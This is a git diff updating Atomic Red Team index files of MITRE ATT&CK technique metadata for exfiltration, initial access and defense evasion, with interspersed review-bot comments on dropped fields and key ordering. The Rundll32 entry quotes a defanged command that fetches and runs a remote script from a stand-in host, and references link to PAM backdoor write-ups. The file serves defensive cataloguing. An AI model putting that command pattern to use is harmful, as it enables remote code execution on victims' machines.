- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -60111,9 +61011,6 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -60176,7 +61073,7 @@ initial-access:
'
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60243,11 +61140,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60299,15 +61195,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60331,10 +61226,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -60353,13 +61247,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -60398,9 +61291,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -60450,7 +61342,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -60470,7 +61361,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60490,8 +61381,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
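Review bot: this hunk drops both `spec_version` and `x_mitre_attack_spec_version` from T1029 with nothing replacing them, whereas the other objects in this patch keep (or bump to 3.2.0) `x_mitre_attack_spec_version` and only lose `spec_version`. The same total removal happens for T1011.001, T1048.001, T1048.002, T1052.001, T1030, T1052 and, in iaas-index.yaml, T1055.011. If any consumer of these indexes filters or validates on `x_mitre_attack_spec_version`, those techniques will now fail that check; confirm the source objects genuinely lack the field rather than the generator dropping it.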
@@ -60538,7 +61427,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -60558,7 +61446,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60580,8 +61468,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -60635,7 +61521,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -60660,7 +61545,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -60695,12 +61580,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60725,11 +61608,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
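Review bot: besides the version bump to '1.3', this hunk silently removes `x_mitre_network_requirements: false` from T1020.001, and the T1048 hunk at @@ -60990 does the same; that is a field going away rather than a data refresh, so it deserves a line in the commit message and a grep for any tooling in the repo that reads that key.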
@@ -60772,9 +61654,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -60821,7 +61702,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -60847,7 +61727,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -60880,13 +61760,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -60935,12 +61813,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -60976,12 +61853,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -60990,7 +61866,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -61014,9 +61889,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -61039,7 +61913,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61061,8 +61935,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -61113,7 +61985,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -61163,7 +62034,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -61188,7 +62058,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -61211,13 +62081,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61258,9 +62126,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -61308,7 +62175,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -61330,7 +62196,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61354,12 +62220,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61423,6 +62287,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/iaas-index.yaml b/atomics/Indexes/iaas-index.yaml
index 1ac83b1d66..44ed384822 100644
--- a/atomics/Indexes/iaas-index.yaml
+++ b/atomics/Indexes/iaas-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
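Review bot: the Aquasec reference description at the top of this hunk carries a leading space inside the double-quoted scalar (`description: " Nitzan Yaakov. (2024, June 4). ...`), which YAML preserves and which will render as `" Nitzan"`; the other descriptions in the hunk have none. It is presumably copied verbatim from upstream, so either accept the stray space or have the generator strip description strings consistently; hand-editing it here would only be undone by the next regeneration.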
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
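Review bot: the two new `source_name` keys `Sysdig Fileless Malware 23022` and `Akami Frog4Shell 2024` read like typos (`23022`, and `Akami` for Akamai), but they match the `(Citation: ...)` tags in the T1027.011 description above exactly, so they resolve. Leave them as-is: the keys are upstream identifiers and the description text references them literally, so normalizing them in this repo would break the citation lookup.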
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
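Review bot: nothing in this hunk is a content change: the removed `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` blocks for T1556.003 all reappear lower down in the following hunk, so this is key reordering from the upstream object plus the `modified` bump. If the generator does not impose a fixed key order before dumping, every regeneration will churn like this; sorting keys, or emitting them in a fixed order, would keep future diffs down to real changes. Separately, the context lines of the `description` literal block break the line after `pam_unix.so`, `/etc/passwd` and `/etc/shadow`, apparently where inline code spans were stripped; that is pre-existing, but worth a follow-up since it splits the sentence.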
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
